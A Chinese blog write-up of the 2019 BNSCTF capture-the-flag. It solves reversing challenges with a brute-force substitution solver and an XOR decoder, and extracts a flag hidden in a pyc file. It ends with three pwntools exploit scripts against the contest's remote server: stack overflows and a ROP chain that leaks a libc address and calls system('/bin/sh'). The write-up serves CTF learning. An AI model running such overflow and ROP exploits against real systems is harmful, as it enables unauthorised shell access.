
CTF-2019年6月BNSCTF

看到学长打,我也去试试水,确实是冷门的CTF,第一届比较水

Re

0x01 简单算法algorithm.rar

醉了,题目存在多个flag,然后要找有英文意义的
将程序导入IDA,发现加密算法只是单字符变换,所以直接把IDA代码扒下来改造

#include<iostream>
#include<stdio.h>
#include<string.h>
using namespace std;
// Substitution tables lifted from the challenge binary (IDA names kept).
//
// v12: per-position key.  Note it holds 29 characters, one fewer than the
//      30 positions test() walks, so at i == 29 it yields the terminating
//      NUL (0).
char v12[] = "AAFMZXDECVFRBNGTHYJUMKIOLPABY";
// Four 64-entry alphabets.  test() picks one by (Str[i] - v12[i]) & 3 and
// indexes it with that same difference.
char v19[] = "0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
char v28[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/";
char v37[] = "+/abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
char v46[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
// Not referenced at file scope in this listing; test() declares a local
// int v3 that shadows it.
char v3[] = "";
// Expected ciphertext (30 bytes) that test2() and main() compare against.
char v6[] = "/cIg5ckkwhX51HYpxAjkU5EgMxnMUt";
// Per-character substitution lifted from the binary (IDA output, lightly
// edited).  Transforms Str in place, one byte at a time, for at most 30
// positions or up to the first NUL, whichever comes first.  Each output byte
// depends only on Str[i] and v12[i]; that independence is what lets main()
// brute-force one position at a time.
void test(char* Str) {
    for (int i = 0;i<30; ++i)
    {
        int v4 = i;  // decompiler alias of i, used only for the length check
        if (v4 >= strlen(Str))
            break;
        // Let d = Str[i] - v12[i].  v3 is 3 when d is negative and 0 otherwise
        // (sign bit smeared by the shift, then >> 30 — assumes the usual
        // arithmetic right shift); v55 is then the compiler's signed "d % 4".
        // This local int v3 shadows the file-scope char v3[].
        int v3 = (unsigned int)((Str[i] - *(v12 + i)) >> 31) >> 30;
        int v55 = (((char)v3 + Str[i] - *(v12 + i)) & 3) - v3;
        // NOTE(review): '' is an empty character literal, which is not valid
        // C++ — presumably a '\0' (or other byte) lost from the original
        // source; confirm against the decompilation.  The rest of the guard
        // requires a printable byte above space and d > 0.
        if (Str[i] != '' && Str[i] > ' ' && Str[i] - *(v12 + i) > 0)
        {
            // Same two expressions again (decompiler artifact).  With d > 0
            // the sign term is 0, so v55 is simply d & 3.
            v3 = (unsigned int)((Str[i] - *(v12 + i)) >> 31) >> 30;
            v55 = (((char)v3 + Str[i] - *(v12 + i)) & 3) - v3;
            // d & 3 selects one of the four 64-byte alphabets and d indexes
            // it.  v12 holds uppercase letters, so for i < 29 and Str[i] <= 127
            // d <= 62 stays inside the table; at i == 29 v12[29] is the NUL
            // terminator, d == Str[29], and any value >= 64 reads past the end
            // of the table (undefined behaviour; main()'s 0..127 sweep hits
            // this for position 29).
            if (v55 == 1)
            {
                Str[i] = *(v37 + Str[i] - (signed int)*(v12 + i));
            }
            else if (v55 > 1)
            {
                if (v55 == 2)
                {
                    Str[i] = *(v28 + Str[i] - (signed int)*(v12 + i));
                }
                else if (v55 == 3)
                {
                    Str[i] = *(v19 + Str[i] - (signed int)*(v12 + i));
                }
            }
            else if (!v55)
            {
                Str[i] = *(v46 + Str[i] - (signed int)*(v12 + i));
            }
        }
    }
}
// Compares the first 30 bytes of Str with the expected ciphertext v6 and
// prints "try again!" for every mismatching position.  There is no early
// exit, so the message may appear once per differing byte, and Str must
// hold at least 30 bytes — the loop does not stop at a NUL.
void test2(char* Str) {
    const char* expected = v6;
    const char* const end = Str + 30;
    for (const char* cur = Str; cur != end; ++cur, ++expected) {
        if (*cur == *expected) {
            continue;
        }
        printf("try again!");
    }
}
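// Brute-forces the 30-byte flag one position at a time.
//
// test() transforms each byte independently (Str[i] depends only on Str[i]
// and v12[i]), so every position can be searched on its own: for each i,
// try every byte value 0..127, run test() over the probe buffer and report
// the values whose transformed byte equals v6[i].  More than one value can
// land on the same ciphertext byte (a value test() leaves untouched but that
// already equals v6[i] also matches), so several candidates are printed per
// position and the readable combination is picked by hand.
//
// The probe is NUL-padded, so test()'s strlen() guard stops right after
// position i; earlier positions get re-transformed on every call, which is
// harmless because no table byte is NUL and each position is independent.
//
// Changes from the original: the unused std::string local and the
// write-only flag[] buffer are gone, as is the no-op `continue`.
int main() {
    char probe[32] = { 33 };  // '!' at [0], remaining bytes NUL
    for (int i = 0; i < 30; i++) {
        for (int j = 0; j < 128; j++) {
            probe[i] = static_cast<char>(j);
            test(probe);  // rewrites probe[i] in place
            if (probe[i] == v6[i]) {
                printf("position:%d %c\n", i, j);
            }
        }
    }
    return 0;
}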

输出结果

position:0  /	position:0  B	position:0  L
position:1 C position:1 ]
position:2 N position:2 h
position:3 S position:3 m
position:4 5 position:4 {
position:5 Z position:5 t
position:6 N position:6 h
position:7 O position:7 i
position:8 Y position:8 s
position:9 _
position:10 i
position:11 5 position:11 s
position:12 1 position:12 _
position:13 H position:13 a position:13 {
position:14 _ position:14 y
position:15 e
position:16 a
position:17 A position:17 s
position:18 y
position:19 _ position:19 y
position:20 a position:20 {
position:21 5 position:21 l
position:22 E position:22 M position:22 g
position:23 U position:23 o
position:24 X position:24 r
position:25 i
position:26 t
position:27 N position:27 h
position:28 U position:28 m
position:29 [ position:29 u

以上输出结果表示各个位置上对应的多种可能解
然后人工去找有意义的英文

BCNS{this_is_a_easy_algorithm}

0x02 EASY_XORmain.rar

这是一个py2exe文件,所以要通过pyinstxtractor.py导出数据
然后在main.exe_extracted目录下找到PYZ-00.pyz_extracted
然后在里面找源代码,最后找到easy.pyc
由于这样导出的文件的头部会出问题,所以考虑本地先生成一个pyc文件,然后把头部数据覆盖到easy.pyc上
我这里是 0x33 0x0D 0x0D 0x0A 只需要覆盖即可,无需添加字节
【注意到main.exe_extracted目录下有一个main,里面可以看到和easy.pyc类似的代码,但不知道为什么无法转化到py】
通过在线pyc转py得到python代码

#!/usr/bin/env python
# encoding: utf-8
# Decompiled check routine from easy.pyc (indentation reconstructed from the
# flat listing).  The input is accepted only when a[i] XOR flag[i] == b[i]
# holds for every i, so each flag byte is simply a[i] XOR b[i]; the short
# C++ program that follows recovers it that way.
if __name__ == '__main__':
    a = 'flag!iS_not&here,getit'  # XOR key, 22 characters
    b = [36,47,47,52,90,32,12,107,3,48,21,121,26,86,19,41,115,33,9,53,14,9]  # expected a[i] ^ flag[i], 22 values
    flag = input('please input the flag:')
    for i in range(len(a)):
        if ord(a[i]) ^ ord(flag[i]) == b[i]:
            continue
        # NOTE(review): this second `continue` makes the print/exit below
        # unreachable; it looks like a decompiler artifact of the rejecting
        # branch -- confirm against the bytecode.
        continue
        print('No!')
        exit()
    print('you get it!')
#include<iostream>
#include<stdio.h>
// XOR key and expected values copied from easy.pyc's a and b (22 entries
// each); the check passes when key[i] ^ flag[i] == crypto[i].
char key[] = "flag!iS_not&here,getit";
char crypto[] = { 36,47,47,52,90,32,12,107,3,48,21,121,26,86,19,41,115,33,9,53,14,9 };
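// Recovers the flag: the check accepts input whose byte i XORed with key[i]
// equals crypto[i], so flag[i] is key[i] ^ crypto[i].  Prints the characters
// with no trailing newline.  The count is derived from crypto[] instead of
// the hard-coded 22 so the two stay in step if the tables are edited.
int main() {
    const size_t count = sizeof(crypto) / sizeof(crypto[0]);
    for (size_t i = 0; i < count; i++) {
        putchar(key[i] ^ crypto[i]);
    }
    return 0;
}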

BCNS{I_4m_a_r3aL_FlAg}

Misc

0x01 签退题love.pyc

这是一题Pyc隐写题,一开始没有发觉,直接Pyc转Py了,然后愣了半天
可以使用stegosaurus.py

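# Extracts (-x) the payload hidden in the .pyc's bytecode.  The original line
# ended in a C-style "//" comment, which a shell would pass to the script as
# two extra arguments; "#" is the shell comment marker.
python stegosaurus.py xxx.pyc -x    # this prints the hidden data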

BCNS{H3lL0_Nic3_t0_m33t_y0U!}

PWN

0x01 签到题check_in

# pwntools script for the check_in challenge; all addresses, ports and
# constants are the writeup's own values.
from pwn import *
#sh = process("./check_in")
# Debug logging echoes every send/recv exchange, which documents the
# service's protocol as the script runs.
context.log_level = "debug"
# Remote challenge endpoint; the commented-out process() line is the
# local-binary variant.
sh = remote("47.107.60.13",10000)
elf = ELF("check_in")  # loaded but not referenced below
# 0x18 bytes of filler followed by two page-supplied 8-byte constants;
# what the binary does with them is not visible from this script.
sh.send("b"*0x18 + p64(0x7FFFFFFFFFFFFFFF)+p64(0x3fb999999999999a))
sh.recv()
sh.sendline("cat flag")
sh.interactive()

0x02 签退题check_out

# pwntools script for the check_out challenge; values are the writeup's own.
from pwn import *
context.log_level = "debug"  # echo every send/recv exchange
#sh = process("./check_out")
sh = remote("47.107.60.13",10001)
# Page-supplied 32-bit address (packed with p32 below).  NOTE(review): a
# fixed address like this presumes the binary is loaded at a constant base
# (no PIE); that is not verifiable from this script.
shell_addr = 0x0804863A
sh.sendline('a'*112+p32(shell_addr))  # 112 filler bytes, then the 4-byte address
sh.interactive()

0x03 check_ing[blindpwn]

# pwntools script for the check_ing (blindpwn) challenge; all addresses,
# offsets and ports are the writeup's own values.
from pwn import *
#sh = process("./blindpwn")
#nc 47.107.60.13:10002
sh = remote("47.107.60.13",10002)
elf = ELF("blindpwn")  # local copy; the got[]/symbols[] lookups below read it
offset = 40
# Page-supplied absolute gadget addresses (non-PIE binary presumed; not
# verifiable from here).
pop_rdi_ret = 0x0000000000400783
pop_rsi_r15_ret = 0x0000000000400781
# First exchange: the service is made to write back 8 bytes, read as an
# address by u64() below, and then returns to main so a second message can
# be sent.
payload = 'a'*offset + p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_r15_ret) + p64(elf.got['__libc_start_main']) + p64(0) + p64(elf.symbols['write']) + p64(elf.symbols['main'])
sh.recvuntil("Welcome to this blind pwn!\n")
sh.sendline(payload)
# Despite the name, this is the GOT value of __libc_start_main, not a libc
# base; the two offsets below are relative to it.
libc = u64(sh.recv(8))
log.success(hex(libc))
# Offsets 0x24c50 / 0x16c617 are specific to the libc build the author
# matched and cannot be derived from this page.
system_addr = libc + 0x24c50
binsh_addr = libc + 0x16c617
payload = 'a' * offset + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
sh.sendline(payload)
sh.interactive()
文章作者: 咲夜南梦
文章链接: http://yoursite.com/2019/06/09/CTF-2019%E5%B9%B46%E6%9C%88BNSCTF/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 咲夜南梦's 博客